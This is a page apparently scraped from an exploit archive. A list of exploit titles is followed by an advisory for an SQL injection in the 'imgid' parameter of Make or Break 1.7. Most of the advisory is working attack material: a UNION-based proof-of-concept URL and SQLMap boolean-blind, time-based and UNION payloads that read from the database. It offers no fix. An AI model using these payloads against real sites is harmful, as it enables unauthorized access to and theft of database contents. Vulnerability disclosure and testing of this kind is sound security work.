1b13c8a790
6 new exploits DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH) ClaSS 0.8.60 - (export.php ftype) Local File Inclusion ClaSS 0.8.60 - 'export.php' Local File Inclusion Miniweb 2.0 - SQL Injection (Authentication Bypass) Miniweb 2.0 - Authentication Bypass eDNews 2.0 - (lg) Local File Inclusion eDContainer 2.22 - (lg) Local File Inclusion eDNews 2.0 - Local File Inclusion eDContainer 2.22 - Local File Inclusion Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection Ultimate PHP Board 2.2.1 - Privilege Escalation Sepcity Shopping Mall - SQL Injection Sepcity Lawyer Portal - SQL Injection Sepcity Classified - 'classdis.asp ID' SQL Injection FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection Flexphplink 0.0.x - (Authentication Bypass) SQL Injection eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Sepcity Classified - 'ID' Parameter SQL Injection FlexPHPDirectory 0.0.1 - Authentication Bypass Flexphpsite 0.0.1 - Authentication Bypass Flexphplink 0.0.x - Authentication Bypass eDNews 2.0 - SQL Injection PHPAlumni - 'Acomment.php id' SQL Injection PHPAlumni - SQL Injection Flexphpic 0.0.x - (Authentication Bypass) SQL Injection Flexphpic 0.0.x - Authentication Bypass Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection Mole Group Vacation Estate Listing Script - Blind SQL Injection Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass) Friends in War Make or Break 1.3 - Authentication Bypass My Php Dating 2.0 - 'path' Parameter SQL Injection My Php Dating 2.0 - 'id' Parameter SQL Injection My PHP Dating 2.0 - 'path' Parameter SQL Injection My PHP Dating 2.0 - 'id' Parameter SQL Injection Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection Starting Page 1.3 - SQL Injection Freepbx < 2.11.1.5 - Remote Code Execution WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)
42 lines
No EOL
1.6 KiB
Text
Executable file
42 lines
No EOL
1.6 KiB
Text
Executable file
# Exploit : Make or Break 1.7 (imgid) SQL Injection Vulnerability
|
|
# Author : v3n0m
|
|
# Contact : v3n0m[at]outlook[dot]com
|
|
# Date : January, 09-2017 GMT +7:00 Jakarta, Indonesia
|
|
# Software : Make or Break
|
|
# Version : 1.7 Lower versions may also be affected
|
|
# License : Free
|
|
# Download : http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
|
|
# Credits : YOGYACARDERLINK, Dhea Fathin Karima & YOU !!
|
|
|
|
1. Description
|
|
|
|
An attacker can exploit this vulnerability to read from the database.
|
|
The parameter 'imgid' is vulnerable.
|
|
|
|
|
|
2. Proof of Concept
|
|
|
|
http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null--
|
|
|
|
# Exploitation via SQLMap
|
|
|
|
Parameter: imgid (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: imgid=1 AND 4688=4688
|
|
Vector: AND [INFERENCE]
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 OR time-based blind
|
|
Payload: imgid=1 OR SLEEP(2)
|
|
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
|
|
|
|
Type: UNION query
|
|
Title: Generic UNION query (NULL) - 11 columns
|
|
Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
|
|
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
|
|
|
|
|
|
3. Security Risk
|
|
|
|
The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high. |